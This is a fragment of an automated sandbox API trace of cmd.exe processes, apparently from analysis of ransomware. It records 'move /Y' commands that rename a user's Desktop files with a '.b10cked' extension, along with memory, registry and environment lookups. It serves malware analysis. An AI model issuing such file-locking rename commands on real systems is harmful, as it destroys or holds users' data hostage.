_MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) 
returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0225.639] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0225.640] _wcsicmp (_String1="GCAP-7~1.BMP", _String2=".") returned 57 [0225.640] _wcsicmp (_String1="GCAP-7~1.BMP", _String2="..") returned 57 [0225.640] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7~1.bmp")) returned 0x20 [0225.640] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xe1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.640] SetErrorMode (uMode=0x0) returned 0x0 [0225.640] SetErrorMode (uMode=0x1) returned 0x0 [0225.640] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", nBufferLength=0x104, lpBuffer=0x2eed2c, lpFilePart=0x2eed14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", lpFilePart=0x2eed14*="GCAP-7~1.BMP") returned 0x25 [0225.640] SetErrorMode (uMode=0x0) returned 0x1 [0225.640] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.640] _wcsicmp (_String1="GCAP-7~1.BMP", _String2=".") returned 57 [0225.640] _wcsicmp (_String1="GCAP-7~1.BMP", _String2="..") returned 57 [0225.640] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7~1.bmp")) returned 0x20 [0225.641] SetErrorMode (uMode=0x0) returned 0x0 [0225.641] SetErrorMode (uMode=0x1) returned 0x0 [0225.641] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", nBufferLength=0x104, lpBuffer=0x2ef1a8, lpFilePart=0x2eef40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", lpFilePart=0x2eef40*="GCAP-7~1.BMP") returned 0x25 [0225.641] SetErrorMode (uMode=0x0) returned 0x1 [0225.641] SetErrorMode (uMode=0x0) returned 0x0 [0225.641] SetErrorMode (uMode=0x1) returned 0x0 [0225.641] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x2ef3b0, lpFilePart=0x2eef40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked", lpFilePart=0x2eef40*="gcAp-7-i61tX.bmp.b10cked") returned 0x31 [0225.641] SetErrorMode (uMode=0x0) returned 0x1 [0225.641] SetLastError (dwErrCode=0x0) [0225.641] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7-i61tx.bmp.b10cked")) returned 0xffffffff [0225.641] GetLastError () returned 0x2 [0225.641] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x2ee8bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee8bc) returned 0xd0ef8 [0225.641] FindNextFileW (in: hFindFile=0xd0ef8, lpFindFileData=0x2ee8bc | out: lpFindFileData=0x2ee8bc) returned 0 [0225.642] GetLastError () returned 0x12 [0225.642] FindClose (in: hFindFile=0xd0ef8 | out: hFindFile=0xd0ef8) returned 1 [0225.643] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", fInfoLevelId=0x1, lpFindFileData=0xe1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xe1ae0) returned 0xd0ef8 [0225.643] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x2eeb54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked", lpFilePart=0x0) returned 0x31 [0225.643] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp", nBufferLength=0x104, lpBuffer=0x2eeb54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp", lpFilePart=0x0) returned 0x29 [0225.643] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7-i61tx.bmp")) returned 0x20 [0225.643] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7-i61tx.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7-i61tx.bmp.b10cked"), dwFlags=0x3) returned 1 [0225.644] FindClose (in: hFindFile=0xd0ef8 | out: hFindFile=0xd0ef8) returned 1 [0225.644] _vsnwprintf (in: _Buffer=0x49e25040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eeb08 | out: _Buffer=" 1") returned 9 [0225.644] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.644] GetFileType (hFile=0x7) returned 0x2 [0225.644] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.644] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eea94 | out: lpMode=0x2eea94) returned 1 [0225.645] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.645] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eeac8 | out: lpConsoleScreenBufferInfo=0x2eeac8) returned 1 [0225.645] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0225.645] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x2eeb08 | 
out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0225.645] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eeaec, lpReserved=0x0 | out: lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x2eeaec*=0x1a) returned 1 [0225.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.646] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.646] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.646] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.646] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.646] SetConsoleInputExeNameW () returned 0x1 [0225.646] GetConsoleOutputCP () returned 0x1b5 [0225.646] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.646] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.646] exit (_Code=0) Process: id = "593" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c60" os_pid = "0x55c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33629 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000010000" filename = "" Region: id = 33630 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33631 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33632 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 33633 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33634 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33635 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33636 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33637 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33638 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33813 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33814 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33815 start_va = 
0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 33816 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33817 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 33818 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33819 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33820 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33821 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33822 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33823 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33824 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename 
= "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33825 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33826 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33827 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 33828 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33829 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33830 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 33831 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 33832 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 33833 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 33834 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 33835 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 
33836 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 817 os_tid = 0xf94 [0225.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af80c | out: lpSystemTimeAsFileTime=0x1af80c*(dwLowDateTime=0xb9d53760, dwHighDateTime=0x1d440a9)) [0225.269] GetCurrentProcessId () returned 0x55c [0225.269] GetCurrentThreadId () returned 0xf94 [0225.269] GetTickCount () returned 0x3e31d [0225.270] QueryPerformanceCounter (in: lpPerformanceCount=0x1af804 | out: lpPerformanceCount=0x1af804*=28205875135) returned 1 [0225.270] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.270] __set_app_type (_Type=0x1) [0225.270] __p__fmode () returned 0x76b331f4 [0225.270] __p__commode () returned 0x76b331fc [0225.271] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.271] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.271] GetCurrentThreadId () returned 0xf94 [0225.271] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf94) returned 0x38 [0225.271] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.271] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.271] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.272] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.272] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af79c | out: phkResult=0x1af79c*=0x0) returned 0x2 [0225.272] VirtualQuery (in: lpAddress=0x1af7d3, lpBuffer=0x1af76c, dwLength=0x1c | out: lpBuffer=0x1af76c*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.272] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af76c, dwLength=0x1c | out: lpBuffer=0x1af76c*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.272] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af76c, dwLength=0x1c | out: lpBuffer=0x1af76c*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.272] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af76c, dwLength=0x1c | out: lpBuffer=0x1af76c*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.272] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af76c, dwLength=0x1c | out: lpBuffer=0x1af76c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.272] GetConsoleOutputCP () returned 0x1b5 [0225.272] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.272] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.272] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.272] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.273] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.273] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.273] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.273] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.273] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.273] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) 
returned 1 [0225.273] GetEnvironmentStringsW () returned 0x280198* [0225.274] FreeEnvironmentStringsW (penv=0x280198) returned 1 [0225.274] GetEnvironmentStringsW () returned 0x280198* [0225.274] FreeEnvironmentStringsW (penv=0x280198) returned 1 [0225.274] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae70c | out: phkResult=0x1ae70c*=0x40) returned 0x0 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, lpData=0x1ae718*=0xc0, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x1, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, lpData=0x1ae718*=0x1, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x0, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x40, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x40, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae714, 
lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, lpData=0x1ae718*=0x40, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.274] RegCloseKey (hKey=0x40) returned 0x0 [0225.274] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae70c | out: phkResult=0x1ae70c*=0x40) returned 0x0 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, lpData=0x1ae718*=0x40, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x1, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, lpData=0x1ae718*=0x1, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x0, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x9, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x9, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, 
lpData=0x1ae718*=0x9, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.275] RegCloseKey (hKey=0x40) returned 0x0 [0225.275] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.275] srand (_Seed=0x5b8863b9) [0225.275] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked\"" [0225.275] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked\"" [0225.275] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.276] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2818f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.276] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.276] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.276] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.276] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.276] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.276] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.276] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.276] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.276] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.276] _wcsicmp (_String1="PROMPT", _String2="RANDOM") 
returned -2 [0225.276] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.276] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.276] GetEnvironmentStringsW () returned 0x2822e8* [0225.277] FreeEnvironmentStringsW (penv=0x2822e8) returned 1 [0225.277] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.277] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.277] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.277] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.277] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.277] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.277] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.277] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.277] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.277] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.277] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af4d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.277] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af4d8, lpFilePart=0x1af4d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af4d4*="Desktop") returned 0x18 [0225.277] GetFileAttributesW 